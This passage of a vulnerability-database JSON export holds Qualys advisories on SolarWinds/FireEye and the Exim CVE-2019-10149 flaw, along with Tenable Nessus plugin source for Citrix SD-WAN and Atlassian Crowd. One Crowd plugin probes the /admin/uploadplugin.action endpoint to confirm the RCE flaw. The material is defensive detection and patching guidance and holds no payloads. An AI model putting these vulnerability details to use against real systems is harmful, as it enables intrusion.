Security Advisory](<https://www.solarwinds.com/securityadvisory>)\n * [FireEye Red Team tools countermeasures](<https://github.com/fireeye/red_team_tool_countermeasure>)\n * [Qualys Research on FireEye Theft](<https://blog.qualys.com/vulnerabilities-research/2020/12/09/theft-of-cybersecurity-tools-fireeye-breach>)\n * [Qualys Research on SolarWinds](<https://blog.qualys.com/vulnerabilities-research/2020/12/14/fireeye-breach-leveraged-solarwinds-orion-software>)\n * [How to quickly deploy Qualys cloud agents for Inventory, Vulnerability and Patch Management](<https://blog.qualys.com/product-tech/2020/03/24/how-to-install-the-qualys-cloud-agent-for-remote-workforce>)", "cvss3": {}, "published": "2020-12-22T21:17:31", "type": "qualysblog", "title": "Qualys Security Advisory: SolarWinds / FireEye", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2020-12-22T21:17:31", "id": "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-15T00:29:31", "description": "Last week, Qualys issued a [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) for a vulnerability we discovered during a code review of Exim. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild. This blog will show you how to quickly identify assets that are impacted by this vulnerability.\n\n### The Vulnerability\n\nThis vulnerability exists in all versions of Exim's MTA from version 4.87 to 4.91. Exploitation of the vulnerability only requires a malicious email to be sent to a vulnerable server, and injected commands will typically run as root. There are multiple ways that Exim can be configured, and some of these will allow for faster exploitation, while others may require a week to fully exploit. For technical details on this vulnerability please see our [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>).\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Several QIDs have been released for various Linux distros, as well as a generic remote Potential QID that will identify Exim hosts.\n\n### Finding Vulnerable Hosts\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability. For customers without Threat Protection, you can manually search for the CVE in AssetView, by using this search string:\n \n \n vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`\n\nThis will return a list of all impacted hosts. The results can also be grouped by Vulnerability, which will allow you to determine which distro patches are needed. To filter out the Potential detections (though these should be evaluated), you can modify the query like this:\n \n \n vulnerabilities:(vulnerability.cveIds:`CVE-2019-10149` and typeDetected:`Confirmed`)\n\n### Remediation\n\nTo remediate this vulnerability, Exim must be updated to version 4.92. Check your Linux OS vendor for updated packages.", "cvss3": {}, "published": "2019-06-14T22:27:14", "type": "qualysblog", "title": "Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-14T22:27:14", "id": "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T19:50:44", "description": "The Exim MTA vulnerability, initially [reported by Qualys](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) in May 2019, is currently being exploited in the wild. Recently, the US National Security Agency (NSA) [announced](<https://www.us-cert.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>) that Sandworm actors (Russian hacker group) have been actively exploiting the Exim Mail Transfer Agent vulnerability.\n\nQualys released a blog post last year describing how to identify assets that are impacted by this vulnerability in your environment: [Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)](<https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149>)\n\n### Sandworm Attacks\n\nExim MTA vulnerability could be exploited by sending a malicious email to the server, allowing an attacker to run code on the server remotely. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild.\n\nNSA mentioned Sandworm actors have been exploiting this vulnerability since at least August 2019. The actors exploited victims using Exim software on their public facing MTAs by sending a command in the \"MAIL FROM\" field of an SMTP (Simple Mail Transfer Protocol) message. Sandworm executed shell script to perform following action on victim's system:\n\n * Add privileged users\n * Disable Network Security settings\n * Update SSH configurations to enable remote access\n * Execute an additional script to enable follow-on exploitation\n\nThe unpatched systems are highly at risk and immediate action should be taken to remediate this vulnerability.\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Qualys released several QIDs for various Linux distros, as well as a generic remote Potential QID (50092) that will identify Exim hosts. You can search for these QIDs in VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`_\n\n\n\nIn addition, [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) customers can effectively prioritize this vulnerability as Qualys QID 50092 contains following RTIs (Real-Time Threat Indicators):\n\n * Active Attacks\n * Public Exploit\n * Predicted High Risk\n * Wormable\n\n\nVMDR customers can also stay on top of these threats proactively via the 'live feed' provided for threat prioritization. With 'live feed' updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats.\n\n\n\n### Remediation\n\nCustomers are advised to update Exim immediately by installing version 4.92 or newer to remediate this vulnerability. System admins can update respective linux distros using package manager or by downloading the latest version from <https://www.exim.org/mirrors.html>\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get the [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>).", "cvss3": {}, "published": "2020-05-29T22:42:14", "type": "qualysblog", "title": "NSA Announces Sandworm Actors Exploiting Exim MTA Vulnerability (CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-29T22:42:14", "id": "QUALYSBLOG:1B84DE2D33648D7FDD0B08B1CC1F1AD8", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-16T15:43:41", "description": "The remote Citrix SD-WAN WANOP device is version 10.2.x prior to 10.2.7, 11.0.x prior to 11.0.3d, 11.1.x prior to 11.1.1a. It is, therefore, affected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker with access to the NSIP/management interface can exploit this issue to bypass authorization. (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker with access to the NSIP/management interface can exploit this issue to create a malicious file which, if executed by a victim on the management network, could allow the attacker arbitrary code execution in the context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker can exploit this issue by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix SD-WAN WANOP devices are also affected by several additional vulnerabilities including configuration-dependent privilege escalations, information disclosures, and a denial of service (DoS) vulnerability.\nPlease refer to advisory CTX276688 for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-09-02T00:00:00", "type": "nessus", "title": "Citrix SD-WAN WANOP 10.2.x Multiple Vulnerabilities (CTX276688)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8198"], "modified": "2022-05-12T00:00:00", "cpe": ["cpe:/a:citrix:sd-wan"], "id": "CITRIX_SDWAN_WANOP_MULTIPLE_VULNS.NASL", "href": "https://www.tenable.com/plugins/nessus/140192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140192);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/12\");\n\n script_cve_id(\n \"CVE-2020-8191\",\n \"CVE-2020-8193\",\n \"CVE-2020-8194\",\n \"CVE-2020-8195\",\n \"CVE-2020-8196\",\n \"CVE-2020-8198\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0286-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Citrix SD-WAN WANOP 10.2.x Multiple Vulnerabilities (CTX276688)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix SD-WAN WANOP device is version 10.2.x prior to 10.2.7, 11.0.x prior to 11.0.3d, 11.1.x prior to\n11.1.1a. It is, therefore, affected by multiple vulnerabilities:\n\n - An authorization bypass vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote\n attacker with access to the NSIP/management interface can exploit this issue to bypass authorization. \n (CVE-2020-8193)\n\n - A code injection vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote attacker\n with access to the NSIP/management interface can exploit this issue to create a malicious file which, if\n executed by a victim on the management network, could allow the attacker arbitrary code execution in the\n context of that user. (CVE-2020-8194)\n\n - A cross-site scripting vulnerability exists in Citrix SD-WAN WANOP devices. An unauthenticated, remote\n attacker can exploit this issue by convincing a user to click a specially crafted URL, to execute\n arbitrary script code in a user's browser session. (CVE-2020-8191, CVE-2020-8198)\n\nIn addition, Citrix SD-WAN WANOP devices are also affected by several additional vulnerabilities including\nconfiguration-dependent privilege escalations, information disclosures, and a denial of service (DoS) vulnerability.\nPlease refer to advisory CTX276688 for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX276688\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Citrix SD-WAN WAN-OS to version 10.2.7, 11.0.3d 11.1.1a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8193\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-8195\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:citrix:sd-wan\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_sdwan_detect.nbin\");\n script_require_keys(\"installed_sw/Citrix SD-WAN\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Citrix SD-WAN';\napp_info = vcf::get_app_info(app:app_name);\n\nedition = app_info['Edition'];\nmodel = app_info['Model'];\npattern = \"WAN-?OP\";\n\nif (!preg(pattern:pattern, string:app_info['Edition']) && !preg(pattern:pattern, string:app_info['Model']))\n audit(AUDIT_HOST_NOT, 'affected');\n\nconstraints = [\n { 'min_version' : '10.2.0', 'fixed_version' : '10.2.7' },\n { 'min_version' : '11.0.0', 'fixed_version' : '11.0.3d' },\n { 'min_version' : '11.1.0', 'fixed_version' : '11.1.1a' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-07-13T16:16:35", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.2.x < 3.2.8 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98658", "href": "https://www.tenable.com/plugins/was/98658", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:36", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98660", "href": "https://www.tenable.com/plugins/was/98660", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:34", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98656", "href": "https://www.tenable.com/plugins/was/98656", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:34", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.1.x < 3.1.6 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98659", "href": "https://www.tenable.com/plugins/was/98659", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:16:35", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.3.x < 3.3.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98657", "href": "https://www.tenable.com/plugins/was/98657", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:21:16", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-22T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "701078.PRM", "href": "https://www.tenable.com/plugins/nnm/701078", "sourceData": "Binary data 701078.prm", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:37:47", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_CVE-2019-11580.NASL", "href": "https://www.tenable.com/plugins/nessus/138553", "sourceData": "#TRUSTED 8f52b3443adbdc031337caca6a3f34431f1b341d3c8301cf3e855f7f3363fbf0bf9b7f0d58e3328a37d6dece24c4c9dcc73ccf78c27c66d987dbdaf6186643afcfe8dbbc2a0517f9fa9531f0240b05a4751809b449e7dc3066482ae086e25a8f94806188dd42bd8ab78dda28cd63fada8492a35233a18a0929ee865082646260d7509392ad29c59b136b7ce199b50c9b7bcfd6458681e82364f52769b833c14183c063bfcf2ba969406b456addd06a58c41686d4c22ae421eea1298aa494c5dfa1ed98dd838ec86de8cc085782289be07f9c3eca1aa874f02206fe704079a7488502da717dcb6223d5b571ad82a45452823e72986ed6a0581d646c30d1d53de860ee91ddd19597a98583110f32b85345b2c36163508b0ccee993f8919c893d2d9e79690bed760d1572886b9e870ec31650c8cbfc554058b352c177810529591eb45f6d9a9d0c1ae0d00d20abe798b9809d0ca28b76a78c63a1bb316535270ee0d30a8efb58ee8a33560d87ee2120ade6e00838d2bead85bb289646fa07933c19f1ef493bb3eb0002b72f80b1a0b67aef6bd2be04668761d49be8c98d3f8fbfff92b0b56f028087c9e4d08fedad1efa53ca16080353f0be83d9346be201249ffeb2db1d808bc47055cce92b6574b049eeda084c90cf42d51403e4c9491d22eb322b7339937ad22dce432806931ddb73d6073e66e35ed7578ed43065921e1ca2bb\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail : TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T13:14:27", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-01-25T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/25\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby an remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 